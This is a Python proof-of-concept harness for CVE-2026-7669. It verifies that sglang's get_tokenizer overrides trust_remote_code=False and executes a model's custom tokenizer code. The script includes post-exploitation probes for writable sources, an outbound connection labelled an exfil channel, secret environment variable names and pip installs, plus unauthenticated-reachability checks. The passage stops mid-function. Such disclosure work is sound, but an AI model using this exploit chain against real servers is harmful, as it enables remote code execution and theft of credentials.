"""
PoC for CVE-2026-7669.
Pins all versions and verifies them at runtime via SHA256 of the vulnerable
file and of the 12-line override block. Aborts with exit 3 if anything has
drifted from the pinned target before any vulnerability test runs.
Phases:
1 transformers + False (control)
1b patched sglang + False (isolates the cause to lines 898-909)
2 real sglang + False (the bug)
2b patched sglang + True (proves the patch is surgical)
3 real sglang + False, slow tokenizer mode
4 severity context for C:H/I:H/A:H
Exit codes:
0 confirmed
1 not triggered
2 false positive (transformers itself executed tokenizer.py)
3 pinned-version preflight failed
"""
import datetime
import hashlib
import importlib
import importlib.machinery
import importlib.util
import inspect
import io
import json
import logging
import os
import shutil
import subprocess
import sys
import tempfile
import types
# Marker file whose existence is treated as "the tokenizer payload ran"
# (see the p*_executed checks in main()).
PROOF_FILE = "/tmp/sglang_poc_proof.txt"
# Test model directory with the custom tokenizer; created by setup_model.py.
MODEL_DIR = "/poc/malicious_model"
# JSON dump of every claim() recorded during a run (see write_ledger()).
LEDGER_FILE = "/tmp/poc_claim_ledger.json"
# Pinned versions, hashes and line numbers that preflight() verifies against.
PINNED_FILE = "/poc/pinned_versions.json"
# The sglang file under test; its SHA256, line count and override block are pinned.
SOURCE_FILE = "/sglang_source/python/sglang/srt/utils/hf_transformers_utils.py"
# Per its name, transformers' cache of dynamically loaded model code; wiped by clean()
# so every phase starts from a cold import of the model's tokenizer module.
HF_DYNAMIC_MODULE_CACHE = os.path.expanduser("~/.cache/huggingface/modules")
# Append-only list of claim dicts (id, desc, status, evidence, ts) filled by claim().
LEDGER: list[dict] = []
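def claim(claim_id, description, status, evidence=""):
    """Record one verifiable claim in LEDGER and echo it to stdout.

    Args:
        claim_id: Short identifier such as "PRE-1" or "PHASE-2".
        description: Human-readable statement being asserted.
        status: One of "PASS", "FAIL" or "NA".
        evidence: Optional supporting detail, printed on a second line.

    Raises:
        ValueError: If ``status`` is not one of the three accepted values.
            (An ``assert`` is stripped under ``python -O`` and would let a
            mistyped status silently enter the ledger, so a real check is used.)
    """
    markers = {"PASS": "[PASS]", "FAIL": "[FAIL]", "NA": "[ N/A]"}
    if status not in markers:
        raise ValueError(f"invalid claim status {status!r} for {claim_id}")
    LEDGER.append({
        "id": claim_id,
        "desc": description,
        "status": status,
        "evidence": evidence,
        "ts": datetime.datetime.now().isoformat(),
    })
    print(f" {markers[status]} {claim_id}: {description}")
    if evidence:
        print(f" -> {evidence}")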
def write_ledger():
    """Serialize LEDGER to LEDGER_FILE as indented JSON with a summary header.

    The header carries the generation timestamp, the total number of claims
    and per-status counts (PASS / FAIL / NA); the claims follow verbatim.
    """
    statuses = [entry["status"] for entry in LEDGER]
    report = {
        "generated": datetime.datetime.now().isoformat(),
        "total": len(LEDGER),
        "passed": statuses.count("PASS"),
        "failed": statuses.count("FAIL"),
        "na": statuses.count("NA"),
        "claims": LEDGER,
    }
    with open(LEDGER_FILE, "w") as fh:
        json.dump(report, fh, indent=2)
    print(f"\n[*] Claim ledger written to {LEDGER_FILE}")
def preflight():
    """Verify the environment matches the pinned target before any test runs.

    Reads PINNED_FILE and records one claim per check: Python version prefix
    (PRE-1), exact transformers version (PRE-2), SHA256 and line count of
    SOURCE_FILE (PRE-3, PRE-4), SHA256 of the pinned vulnerable line range
    (PRE-5), the default value of get_tokenizer()'s trust_remote_code
    parameter (PRE-6) and the file the imported get_tokenizer really comes
    from (PRE-7). A failed transformers import or a missing SOURCE_FILE exits
    3 immediately; any other failure is collected and exits 3 at the end.

    Returns:
        The parsed pinned-version dict when every check passed.
    """
    print("=" * 72)
    print(" PREFLIGHT")
    print("=" * 72)
    with open(PINNED_FILE) as f:
        pinned = json.load(f)
    fail = False
    # PRE-1: interpreter version prefix.
    py_ver = sys.version.split()[0]
    if py_ver.startswith(pinned["python_version_prefix"]):
        claim("PRE-1", f"Python version starts with {pinned['python_version_prefix']}",
              "PASS", f"runtime={py_ver}")
    else:
        claim("PRE-1", f"Python version starts with {pinned['python_version_prefix']}",
              "FAIL", f"runtime={py_ver}")
        fail = True
    # PRE-2: exact transformers version; an import failure is fatal on its own.
    try:
        import transformers
        tf_ver = transformers.__version__
    except Exception as e:
        claim("PRE-2", f"transformers=={pinned['transformers_version']}",
              "FAIL", f"import error: {e}")
        write_ledger()
        sys.exit(3)
    if tf_ver == pinned["transformers_version"]:
        claim("PRE-2", f"transformers=={pinned['transformers_version']}",
              "PASS", f"runtime={tf_ver}")
    else:
        claim("PRE-2", f"transformers=={pinned['transformers_version']}",
              "FAIL", f"runtime={tf_ver}")
        fail = True
    # PRE-3: the file under test must exist (fatal) and hash to the pinned
    # value. The same claim id is used for both; only one can be recorded
    # because a missing file exits here.
    if not os.path.exists(SOURCE_FILE):
        claim("PRE-3", f"sglang source present at {SOURCE_FILE}",
              "FAIL", "file not found")
        write_ledger()
        sys.exit(3)
    with open(SOURCE_FILE, "rb") as f:
        file_bytes = f.read()
    file_sha = hashlib.sha256(file_bytes).hexdigest()
    if file_sha == pinned["hf_transformers_utils_sha256"]:
        claim("PRE-3", "hf_transformers_utils.py SHA256 matches pinned",
              "PASS", f"sha256={file_sha}")
    else:
        claim("PRE-3", "hf_transformers_utils.py SHA256 matches pinned",
              "FAIL", f"runtime={file_sha} expected={pinned['hf_transformers_utils_sha256']}")
        fail = True
    # PRE-4: line count. decode() is UTF-8 by default and raises on invalid
    # bytes; split("\n") on a newline-terminated file yields one trailing empty
    # element, hence the "- 1".
    file_lines = file_bytes.decode().split("\n")
    if len(file_lines) - 1 == pinned["hf_transformers_utils_lines"]:
        claim("PRE-4", "hf_transformers_utils.py line count matches pinned",
              "PASS", f"lines={len(file_lines) - 1}")
    else:
        claim("PRE-4", "hf_transformers_utils.py line count matches pinned",
              "FAIL", f"runtime={len(file_lines) - 1} expected={pinned['hf_transformers_utils_lines']}")
        fail = True
    # PRE-5: hash of just the pinned line range (1-based, inclusive), so a
    # drift elsewhere in the file can be told apart from a change to the
    # block under test.
    block_first = pinned["vuln_block_first_line"]
    block_last = pinned["vuln_block_last_line"]
    block = "\n".join(file_lines[block_first - 1:block_last])
    block_sha = hashlib.sha256(block.encode()).hexdigest()
    if block_sha == pinned["vuln_block_sha256"]:
        claim("PRE-5", f"Vulnerable block (lines {block_first}-{block_last}) SHA256 matches pinned",
              "PASS", f"sha256={block_sha}")
    else:
        claim("PRE-5", f"Vulnerable block (lines {block_first}-{block_last}) SHA256 matches pinned",
              "FAIL", f"runtime={block_sha} expected={pinned['vuln_block_sha256']}")
        fail = True
    # PRE-6: default of the trust_remote_code parameter, read from the live
    # signature. Placeholders for the packages in _STUB_MODULES are installed
    # first so the sglang import can succeed in this environment.
    stub_gpu_modules()
    from sglang.srt.utils.hf_transformers_utils import get_tokenizer
    sig = inspect.signature(get_tokenizer)
    default_trc = sig.parameters["trust_remote_code"].default
    if default_trc == pinned["expected_default_trust_remote_code"]:
        claim("PRE-6", f"get_tokenizer() default trust_remote_code == {pinned['expected_default_trust_remote_code']}",
              "PASS", f"default={default_trc}")
    else:
        claim("PRE-6", f"get_tokenizer() default trust_remote_code == {pinned['expected_default_trust_remote_code']}",
              "FAIL", f"default={default_trc}")
        fail = True
    # PRE-7: the imported function must come from the hashed file, not from
    # some other installed copy of sglang on sys.path.
    actual_src = get_tokenizer.__code__.co_filename
    if actual_src == SOURCE_FILE:
        claim("PRE-7", "imported get_tokenizer file path matches pinned source",
              "PASS", f"path={actual_src}")
    else:
        claim("PRE-7", "imported get_tokenizer file path matches pinned source",
              "FAIL", f"runtime={actual_src} expected={SOURCE_FILE}")
        fail = True
    if fail:
        print("\n[!] PREFLIGHT FAILED. Refusing to run vulnerability tests.")
        write_ledger()
        sys.exit(3)
    print("\n[OK] Preflight passed.\n")
    return pinned
# Module names replaced with empty placeholders by stub_gpu_modules() so that
# importing sglang does not require them to be installed. Presumably these are
# GPU/kernel packages pulled in at sglang import time; the list is specific to
# the pinned sglang version and should be re-checked if the pin changes.
_STUB_MODULES = [
    "cuda_python", "flashinfer", "flashinfer_python", "sglang_kernel",
    "quack_kernels", "xgrammar", "torch_memory_saver", "flash_attn_4",
    "flash_attn", "vllm", "nvidia", "nvidia.cutlass", "nvidia_cutlass_dsl",
    "sglang.srt.layers", "openai_harmony", "torchcodec",
    "smg_grpc_servicer", "apache_tvm_ffi", "llguidance",
]
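def stub_gpu_modules(modules=None):
    """Insert empty placeholder modules into sys.modules for optional dependencies.

    For every name in ``modules`` (default: _STUB_MODULES) that is not already
    present in sys.modules, a bare ModuleType carrying a ModuleSpec and
    ``__version__ == "0.0.0"`` is registered so that ``import <name>`` succeeds
    without the real package. Names already imported are left untouched, so the
    function is safe to call more than once.

    Args:
        modules: Iterable of dotted module names to stub; ``None`` selects
            _STUB_MODULES.
    """
    names = _STUB_MODULES if modules is None else modules
    for mod in names:
        if mod in sys.modules:
            continue
        fake = types.ModuleType(mod)
        # Attach a spec so the stub looks like a normally imported module to
        # code that inspects __spec__.
        fake.__spec__ = importlib.machinery.ModuleSpec(mod, None)
        fake.__version__ = "0.0.0"
        sys.modules[mod] = fake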
def clean():
    """Remove run artifacts: the proof file and the dynamic-module cache directory.

    Each removal only happens when the path exists; the cache removal
    additionally ignores errors from rmtree.
    """
    targets = (
        (PROOF_FILE, os.path.exists, os.remove),
        (HF_DYNAMIC_MODULE_CACHE, os.path.isdir,
         lambda p: shutil.rmtree(p, ignore_errors=True)),
    )
    for target, present, remove in targets:
        if present(target):
            remove(target)
def clear_tokenizer_cache():
    """Evict cached tokenizer-related modules so the next load re-executes them.

    Removes from sys.modules every key that contains "malicious"
    (case-insensitive), starts with "transformers_modules" (the prefix
    transformers uses for dynamically loaded code), or starts with
    "tokenizer" without containing "transformers" anywhere in the name.
    """
    def is_stale(name):
        if "malicious" in name.lower():
            return True
        if name.startswith("transformers_modules"):
            return True
        return name.startswith("tokenizer") and "transformers" not in name

    stale = [key for key in sys.modules if is_stale(key)]
    for key in stale:
        sys.modules.pop(key)
class _Trace:
    """Ordered record of outer-level AutoTokenizer.from_pretrained calls.

    ``calls`` holds one dict per recorded call, appended by the wrapper set up
    in install_autotokenizer_trace(). ``reset`` empties the list in place so
    that references to it taken earlier remain valid.
    """

    def __init__(self):
        self.calls: list[dict] = []

    def reset(self):
        del self.calls[:]
# Shared call recorder filled by the wrapper installed in install_autotokenizer_trace().
TRACE = _Trace()
# Guards install_autotokenizer_trace() so the wrapper is installed only once.
_TRACE_INSTALLED = False
# Current nesting depth of traced from_pretrained calls, kept in a dict so the
# nested wrapper can mutate it through a shared reference.
_TRACE_DEPTH = {"n": 0}
def install_autotokenizer_trace():
    """Wrap transformers.AutoTokenizer.from_pretrained to record outer-level calls.

    Every call entered at depth 0 appends one dict to TRACE.calls with the
    positional path argument (or "<no-arg>"), the trust_remote_code keyword as
    passed (or "<not-passed>"), the returned type name and the exception type
    name if one propagated. Calls transformers makes recursively while a traced
    call is in progress are executed but not recorded. Repeated calls are
    no-ops after the first.
    """
    # Idempotent. Module-level flag because classmethod descriptors break
    # function-attribute checks for "already installed".
    global _TRACE_INSTALLED
    if _TRACE_INSTALLED:
        return
    from transformers import AutoTokenizer
    # Bound classmethod; its __func__ is the plain function invoked below.
    original = AutoTokenizer.from_pretrained
    depth = _TRACE_DEPTH

    @classmethod
    def traced(cls, *args, **kwargs):
        # Record only outer-level calls. Transformers recurses internally
        # for sub-tokenizers; nested calls are not what sglang chose to do.
        is_outer = depth["n"] == 0
        depth["n"] += 1
        trc = kwargs.get("trust_remote_code", "<not-passed>")
        path = args[0] if args else "<no-arg>"
        result = None
        exc = None
        try:
            result = original.__func__(cls, *args, **kwargs)
            return result
        except BaseException as e:
            exc = e
            raise
        finally:
            # Runs on both return and raise, so the depth counter always
            # unwinds and the outer call is recorded exactly once.
            depth["n"] -= 1
            if is_outer:
                TRACE.calls.append({
                    "idx": len(TRACE.calls),
                    "path": str(path),
                    "trust_remote_code": trc,
                    "returned_type": type(result).__name__ if result is not None else None,
                    "exception": type(exc).__name__ if exc is not None else None,
                })
    AutoTokenizer.from_pretrained = traced
    _TRACE_INSTALLED = True
class _LogCapture:
    """Collect DEBUG-level log records from selected loggers into a string buffer."""

    def __init__(self):
        buffer = io.StringIO()
        handler = logging.StreamHandler(buffer)
        handler.setLevel(logging.DEBUG)
        self.buffer = buffer
        self.handler = handler

    def install(self, logger_name):
        """Attach the shared handler to ``logger_name`` at DEBUG level with propagation on."""
        target = logging.getLogger(logger_name)
        target.setLevel(logging.DEBUG)
        target.addHandler(self.handler)
        target.propagate = True

    def reset(self):
        """Discard everything captured so far and rewind the buffer."""
        self.buffer.truncate(0)
        self.buffer.seek(0)

    def getvalue(self):
        """Return all text captured since the last reset."""
        return self.buffer.getvalue()
# Single capture buffer shared by the root and sglang loggers (see install_logger_capture()).
LOG = _LogCapture()
def install_logger_capture():
    """Route root and sglang logger output at DEBUG level into LOG's buffer."""
    root_logger = logging.getLogger()
    root_logger.setLevel(logging.DEBUG)
    root_logger.addHandler(LOG.handler)
    for logger_name in ("sglang", "sglang.srt.utils.hf_transformers_utils"):
        LOG.install(logger_name)
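def _patch_out_override_block(src):
    """Return ``src`` with the TokenizersBackend override block replaced by comments.

    The first line containing both "TokenizersBackend" and
    "type(tokenizer).__name__" starts the patched region; each following line
    that is blank or indented is replaced too, and the region ends at the next
    non-blank line that starts in column 0. Replacement lines are comments so
    the enclosing block stays syntactically valid.
    NOTE(review): because the region only ends at a column-0 line, confirm
    against the pinned source that it covers exactly the intended 12-line
    block and nothing that follows it inside the same function.
    """
    out = []
    skip = False
    for line in src.split("\n"):
        if "TokenizersBackend" in line and "type(tokenizer).__name__" in line:
            skip = True
            out.append(" # [PATCHED OUT FOR CONTROL TEST]")
            continue
        if skip:
            stripped = line.lstrip()
            if stripped and not line.startswith(" "):
                skip = False
                out.append(line)
            else:
                out.append(" # [PATCHED OUT]")
        else:
            out.append(line)
    return "\n".join(out)


def get_patched_tokenizer_func(source_file=None):
    """Load a copy of hf_transformers_utils.py with the override block removed.

    The patched source is written to a fresh temporary ``.py`` file (created
    with tempfile.mkstemp instead of a fixed, predictable /tmp name) and then
    executed in this process as a standalone module named "patched_utils".
    The temporary file is left in place so inspect/traceback can still find
    the module's source.

    Args:
        source_file: Path of the file to patch; ``None`` selects SOURCE_FILE.

    Returns:
        The ``get_tokenizer`` function object from the patched module.
    """
    path = SOURCE_FILE if source_file is None else source_file
    with open(path) as f:
        patched_src = _patch_out_override_block(f.read())
    fd, patched_path = tempfile.mkstemp(
        prefix="patched_hf_transformers_utils_", suffix=".py")
    with os.fdopen(fd, "w") as f:
        f.write(patched_src)
    spec = importlib.util.spec_from_file_location("patched_utils", patched_path)
    mod = importlib.util.module_from_spec(spec)
    spec.loader.exec_module(mod)
    return mod.get_tokenizer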
def phase_header(num, title):
    """Print a blank line, a 72-dash rule, " PHASE <num>: <title>", and another rule."""
    rule = "-" * 72
    banner = ["", rule, f" PHASE {num}: {title}", rule]
    print("\n".join(banner))
def main():
    """Run the complete PoC and exit with the code documented in the module docstring.

    Order of operations: preflight(), install the from_pretrained trace and
    the log capture, require MODEL_DIR, then phases 1, 1b, 2, 2b and 3
    (tokenizer loads under different call paths), phase 4 (in-process
    capability probes recorded as evidence for the CVSS impact metrics) and
    phase 5 (auth decision and static reachability checks for the UI metric),
    followed by a summary table and the ledger dump. Exits 2 as soon as a
    control phase (1 or 1b) writes PROOF_FILE, 3 when MODEL_DIR or the
    expected source is missing, 0 when phase 2 wrote PROOF_FILE, else 1.
    """
    print("=" * 72)
    print(" CVE-2026-7669 PoC")
    print("=" * 72)
    preflight()
    install_autotokenizer_trace()
    install_logger_capture()
    if not os.path.isdir(MODEL_DIR):
        print(f"[!] {MODEL_DIR} not found. Run setup_model.py first.")
        write_ledger()
        sys.exit(3)
    with open(f"{MODEL_DIR}/tokenizer_config.json") as f:
        tc = json.load(f)
    print(f"[*] Malicious model at {MODEL_DIR}")
    print(f"[*] tokenizer_config.json: {json.dumps(tc)}\n")
    # SRC-1: the imported function must contain the retry logic under test;
    # otherwise this is not the pinned code and the run stops.
    from sglang.srt.utils.hf_transformers_utils import get_tokenizer
    src_text = inspect.getsource(get_tokenizer)
    if "TokenizersBackend" not in src_text:
        claim("SRC-1", "Imported get_tokenizer source contains TokenizersBackend retry",
              "FAIL", "not found in source")
        write_ledger()
        sys.exit(3)
    claim("SRC-1", "Imported get_tokenizer source contains TokenizersBackend retry",
          "PASS", f"file={get_tokenizer.__code__.co_filename}")
    # PHASE 1 -- control: transformers alone with trust_remote_code=False.
    # If PROOF_FILE appears here the defect is upstream, not in sglang, and
    # the run stops with exit 2 (false positive).
    phase_header("1", "transformers + False (control)")
    clean()
    clear_tokenizer_cache()
    LOG.reset()
    TRACE.reset()
    # AutoTokenizer.from_pretrained is already the traced wrapper at this point.
    from transformers import AutoTokenizer
    p1_type = None
    try:
        tok = AutoTokenizer.from_pretrained(MODEL_DIR, trust_remote_code=False)
        p1_type = type(tok).__name__
    except Exception as e:
        p1_type = f"EXCEPTION:{type(e).__name__}"
    p1_executed = os.path.exists(PROOF_FILE)
    print(f" trace: {TRACE.calls}")
    print(f" return: {p1_type} proof_file_written={p1_executed}")
    if p1_executed:
        claim("PHASE-1", "transformers respects trust_remote_code=False (no payload exec)",
              "FAIL", "proof file written; bug is in transformers, not sglang")
        write_ledger()
        sys.exit(2)
    claim("PHASE-1", "transformers respects trust_remote_code=False (no payload exec)",
          "PASS", f"return={p1_type} traced_calls={len(TRACE.calls)}")
    # PHASE 1b -- control: sglang's get_tokenizer with the override block
    # patched out. Must respect False and make exactly one from_pretrained call.
    phase_header("1b", "patched sglang (lines 898-909 removed) + False")
    clean()
    clear_tokenizer_cache()
    LOG.reset()
    TRACE.reset()
    install_autotokenizer_trace()  # no-op after the first install
    patched_get_tokenizer = get_patched_tokenizer_func()
    p1b_type = None
    try:
        tok = patched_get_tokenizer(MODEL_DIR, trust_remote_code=False)
        p1b_type = type(tok).__name__
    except Exception as e:
        p1b_type = f"EXCEPTION:{type(e).__name__}"
    p1b_executed = os.path.exists(PROOF_FILE)
    p1b_trace = list(TRACE.calls)
    print(f" trace: {p1b_trace}")
    print(f" return: {p1b_type} proof_file_written={p1b_executed}")
    if p1b_executed:
        claim("PHASE-1b", "Patched sglang (without override block) respects False",
              "FAIL", "proof file written even with override block removed")
        write_ledger()
        sys.exit(2)
    claim("PHASE-1b", "Patched sglang (without override block) respects False",
          "PASS", f"return={p1b_type} traced_calls={len(p1b_trace)}")
    if len(p1b_trace) == 1:
        claim("PHASE-1b-mech", "Patched function makes exactly 1 from_pretrained call",
              "PASS", f"calls={len(p1b_trace)} trc_values={[c['trust_remote_code'] for c in p1b_trace]}")
    else:
        claim("PHASE-1b-mech", "Patched function makes exactly 1 from_pretrained call",
              "FAIL", f"calls={len(p1b_trace)} (expected 1)")
    # PHASE 2 -- the defect: unmodified get_tokenizer with False. The checks
    # below expect a first call with False returning TokenizersBackend and a
    # second call with True returning MaliciousTokenizer.
    phase_header("2", "real sglang + False (the bug)")
    clean()
    clear_tokenizer_cache()
    LOG.reset()
    TRACE.reset()
    install_autotokenizer_trace()
    p2_type = None
    try:
        tok = get_tokenizer(MODEL_DIR, trust_remote_code=False)
        p2_type = type(tok).__name__
    except Exception as e:
        p2_type = f"EXCEPTION:{type(e).__name__}"
    p2_executed = os.path.exists(PROOF_FILE)
    p2_trace = list(TRACE.calls)
    print(f" trace: {p2_trace}")
    print(f" return: {p2_type} proof_file_written={p2_executed}")
    if p2_executed:
        claim("PHASE-2", "Real sglang executes tokenizer.py despite caller False",
              "PASS", f"return={p2_type} proof_file_written")
    else:
        claim("PHASE-2", "Real sglang executes tokenizer.py despite caller False",
              "FAIL", f"return={p2_type}")
    if len(p2_trace) >= 2:
        first, second = p2_trace[0], p2_trace[1]
        first_ok = (first["trust_remote_code"] is False
                    and first["returned_type"] == "TokenizersBackend")
        second_ok = (second["trust_remote_code"] is True
                     and second["returned_type"] == "MaliciousTokenizer")
        if first_ok and second_ok:
            claim("PHASE-2-mech",
                  "Trace proves: 1st call(False)->TokenizersBackend, 2nd call(True)->MaliciousTokenizer",
                  "PASS", f"call0={first} call1={second}")
        else:
            claim("PHASE-2-mech",
                  "Trace proves: 1st call(False)->TokenizersBackend, 2nd call(True)->MaliciousTokenizer",
                  "FAIL", f"first_ok={first_ok} second_ok={second_ok} trace={p2_trace}")
    else:
        claim("PHASE-2-mech", "Trace proves the two-call override pattern",
              "FAIL", f"trace had only {len(p2_trace)} calls")
    # Detection angle: with DEBUG capture on the root and sglang loggers,
    # check whether any log line mentions trust_remote_code. None means an
    # operator has nothing in the logs to alert on when the override happens.
    log_text = LOG.getvalue()
    override_lines = [
        l for l in log_text.split("\n") if l.strip()
        and "trust_remote_code" in l.lower()
    ]
    if not override_lines:
        claim("PHASE-2-silent",
              "No log line mentions trust_remote_code during the override (DEBUG capture)",
              "PASS", f"captured {len(log_text)} chars; 0 mention trust_remote_code")
    else:
        claim("PHASE-2-silent",
              "No log line mentions trust_remote_code during the override (DEBUG capture)",
              "FAIL", f"matched: {override_lines[:3]}")
    # PHASE 2b -- patched function with an explicit True must still load the
    # custom tokenizer, showing the removed block is the only behavioural
    # difference introduced by the patch.
    phase_header("2b", "patched sglang + True (patch is surgical)")
    clean()
    clear_tokenizer_cache()
    LOG.reset()
    TRACE.reset()
    install_autotokenizer_trace()
    p2b_type = None
    try:
        tok = patched_get_tokenizer(MODEL_DIR, trust_remote_code=True)
        p2b_type = type(tok).__name__
    except Exception as e:
        p2b_type = f"EXCEPTION:{type(e).__name__}"
    p2b_executed = os.path.exists(PROOF_FILE)
    print(f" trace: {TRACE.calls}")
    print(f" return: {p2b_type} proof_file_written={p2b_executed}")
    if p2b_executed and p2b_type == "MaliciousTokenizer":
        claim("PHASE-2b",
              "Patched sglang + explicit True still loads the model (patch is surgical)",
              "PASS", f"return={p2b_type}")
    else:
        claim("PHASE-2b",
              "Patched sglang + explicit True still loads the model (patch is surgical)",
              "FAIL", f"return={p2b_type} executed={p2b_executed}")
    # PHASE 3 -- same as phase 2 but with tokenizer_mode="slow". The
    # via_override flag tells whether the same two-call pattern was observed;
    # if not, the result is recorded as N/A rather than FAIL.
    phase_header("3", "real sglang + False + tokenizer_mode='slow'")
    clean()
    clear_tokenizer_cache()
    LOG.reset()
    TRACE.reset()
    install_autotokenizer_trace()
    p3_type = None
    try:
        tok = get_tokenizer(MODEL_DIR, trust_remote_code=False, tokenizer_mode="slow")
        p3_type = type(tok).__name__
    except Exception as e:
        p3_type = f"EXCEPTION:{type(e).__name__}"
    p3_executed = os.path.exists(PROOF_FILE)
    p3_trace = list(TRACE.calls)
    print(f" trace: {p3_trace}")
    print(f" return: {p3_type} proof_file_written={p3_executed}")
    via_override = (
        len(p3_trace) >= 2
        and p3_trace[0]["trust_remote_code"] is False
        and p3_trace[0]["returned_type"] == "TokenizersBackend"
        and p3_trace[1]["trust_remote_code"] is True
        and p3_trace[1]["returned_type"] == "MaliciousTokenizer"
    )
    if p3_executed:
        claim("PHASE-3-rce", "Slow mode also achieves code execution",
              "PASS", f"return={p3_type}")
    else:
        claim("PHASE-3-rce", "Slow mode also achieves code execution",
              "FAIL", f"return={p3_type} executed={p3_executed}")
    if via_override:
        claim("PHASE-3-via-override",
              "Slow mode reaches RCE via the SAME 898-909 override path",
              "PASS", f"trace={p3_trace}")
    else:
        claim("PHASE-3-via-override",
              "Slow mode reaches RCE via the SAME 898-909 override path",
              "NA", f"different code path; trace={p3_trace}")
    # PHASE 4 -- capability probes backing the CVSS impact vector. Each probe
    # only records whether the process that loaded the tokenizer could do
    # something (write sglang sources, write the model dir, reach the network,
    # see secret-looking env var names, run pip). The write probes append an
    # empty string or create and delete a scratch file, pip runs with
    # --dry-run, and only env var NAMES are recorded, never values.
    phase_header("4", "severity context for C:H/I:H/A:H")
    print(" In-process post-exploitation primitives. Not a CVSS Scope claim.\n")
    src_path = get_tokenizer.__code__.co_filename
    try:
        with open(src_path, "a") as f:
            f.write("")
        claim("SEV-write-sglang", "Process can write to sglang source file (integrity)",
              "PASS", f"writable: {src_path}")
    except Exception as e:
        claim("SEV-write-sglang", "Process can write to sglang source file (integrity)",
              "FAIL", str(e))
    launch_files = [
        "/sglang_source/python/sglang/launch_server.py",
        os.path.join(os.path.dirname(os.path.dirname(src_path)), "launch_server.py"),
    ]
    sev_b = "FAIL"
    for lf in launch_files:
        if os.path.exists(lf):
            try:
                with open(lf, "a") as f:
                    f.write("")
                sev_b = "PASS"
                claim("SEV-write-launchsrv",
                      "Process can write to launch_server.py (integrity)",
                      "PASS", f"writable: {lf}")
                break
            except Exception:
                # Not writable; try the next candidate path.
                pass
    if sev_b == "FAIL":
        claim("SEV-write-launchsrv",
              "Process can write to launch_server.py (integrity)",
              "FAIL", "no launch_server.py path is writable")
    try:
        tp = os.path.join(MODEL_DIR, ".write_test")
        with open(tp, "w") as f:
            f.write("x")
        os.remove(tp)
        claim("SEV-write-model", "Process can write to model dir (integrity)",
              "PASS", f"writable: {MODEL_DIR}")
    except Exception as e:
        claim("SEV-write-model", "Process can write to model dir (integrity)",
              "FAIL", str(e))
    # Outbound connectivity probe to a public host. In a network-isolated
    # test container this records FAIL, which is the expected hardened result.
    import socket as _socket
    try:
        s = _socket.socket(_socket.AF_INET, _socket.SOCK_STREAM)
        s.settimeout(3)
        s.connect(("1.1.1.1", 80))
        s.send(b"GET / HTTP/1.0\r\nHost: 1.1.1.1\r\n\r\n")
        data = s.recv(120)
        s.close()
        claim("SEV-network", "Process can open outbound TCP (exfil channel)",
              "PASS", f"received {len(data)} bytes from 1.1.1.1")
    except Exception as e:
        claim("SEV-network", "Process can open outbound TCP (exfil channel)",
              "FAIL", str(e))
    # Only variable names matching common secret patterns are listed.
    secret_keys = [k for k in os.environ
                   if any(s in k.upper() for s in ("TOKEN", "KEY", "SECRET", "PASS", "AUTH", "HF_"))]
    if secret_keys:
        claim("SEV-secrets", "Process can read env secrets (confidentiality)",
              "PASS", f"captured: {sorted(secret_keys)}")
    else:
        claim("SEV-secrets", "Process can read env secrets (confidentiality)",
              "NA", "no token/key env vars set in test container")
    # --dry-run resolves the install without changing the environment.
    try:
        r = subprocess.run(
            [sys.executable, "-m", "pip", "install", "--dry-run", "requests"],
            capture_output=True, text=True, timeout=15,
        )
        if r.returncode == 0:
            claim("SEV-pip", "Process can install arbitrary packages (integrity / supply chain)",
                  "PASS", "pip --dry-run succeeded")
        else:
            claim("SEV-pip", "Process can install arbitrary packages (integrity / supply chain)",
                  "FAIL", f"rc={r.returncode}")
    except Exception as e:
        claim("SEV-pip", "Process can install arbitrary packages (integrity / supply chain)",
              "FAIL", str(e))
    # Running as root is recorded as context only; it is not required for the finding.
    uid = os.getuid()
    if uid == 0:
        claim("SEV-root", "Process running as root (severity multiplier in lmsysorg image)",
              "PASS", f"uid={uid}")
    else:
        claim("SEV-root", "Process running as root (severity multiplier in lmsysorg image)",
              "NA", f"uid={uid}")
    # PHASE 5 -- can an unauthenticated HTTP client reach get_tokenizer after
    # startup? AUTH-1..3 exercise the auth decision function directly; CHAIN-1
    # is a static text scan of the entrypoint/manager sources. Together they
    # decide between UI:N and UI:R in CHAIN-2.
    phase_header("5", "HTTP attack surface and chain reachability")
    print(" Tests whether an unauth network attacker can reach get_tokenizer")
    print(" via the SGLang HTTP API. If yes -> UI:N is justified -> 9.8 Critical.")
    print(" If no -> UI:R stands -> 8.8 High.\n")
    # AUTH-1..3: pure-function auth decision under default config.
    from sglang.srt.utils.auth import decide_request_auth, AuthLevel
    d = decide_request_auth(
        method="POST", path="/update_weights_from_disk",
        authorization_header=None,
        api_key=None, admin_api_key=None,
        auth_level=AuthLevel.ADMIN_OPTIONAL,
    )
    if d.allowed:
        claim("AUTH-1",
              "ADMIN_OPTIONAL endpoint is unauth-reachable when api_key=None and admin_api_key=None",
              "PASS", f"decision allowed=True (default ServerArgs config)")
    else:
        claim("AUTH-1",
              "ADMIN_OPTIONAL endpoint is unauth-reachable when api_key=None and admin_api_key=None",
              "FAIL", f"decision allowed={d.allowed}")
    d = decide_request_auth(
        method="POST", path="/update_weights_from_disk",
        authorization_header=None,
        api_key="secret", admin_api_key=None,
        auth_level=AuthLevel.ADMIN_OPTIONAL,
    )
    if not d.allowed and d.error_status_code == 401:
        claim("AUTH-2",
              "Positive control: api_key set, no Bearer header -> blocked (401)",
              "PASS", f"allowed=False status={d.error_status_code}")
    else:
        claim("AUTH-2",
              "Positive control: api_key set, no Bearer header -> blocked (401)",
              "FAIL", f"allowed={d.allowed} status={d.error_status_code}")
    d = decide_request_auth(
        method="POST", path="/update_weights_from_disk",
        authorization_header="Bearer secret",
        api_key="secret", admin_api_key=None,
        auth_level=AuthLevel.ADMIN_OPTIONAL,
    )
    if d.allowed:
        claim("AUTH-3",
              "Positive control: valid Bearer with matching api_key -> allowed",
              "PASS", "allowed=True")
    else:
        claim("AUTH-3",
              "Positive control: valid Bearer with matching api_key -> allowed",
              "FAIL", f"allowed={d.allowed}")
    # CHAIN-1: does any HTTP endpoint reach get_tokenizer post-startup?
    # Five independent grep checks across the entire entrypoints/managers tree.
    # If ANY of these find a hit, UI:R is in doubt and the result needs review.
    # NOTE(review): these are substring counts over source text, not a call
    # graph; they can miss indirect reachability and should be re-run on any
    # newer sglang version before reusing the verdict.
    SGLANG_ROOT = "/sglang_source/python/sglang/srt"
    http_server_path = f"{SGLANG_ROOT}/entrypoints/http_server.py"
    tokenizer_manager_path = f"{SGLANG_ROOT}/managers/tokenizer_manager.py"
    multi_tok_path = f"{SGLANG_ROOT}/managers/multi_tokenizer_mixin.py"

    def read_or_empty(p):
        # Return the file's text, or None when it does not exist.
        if not os.path.exists(p):
            return None
        with open(p) as f:
            return f.read()

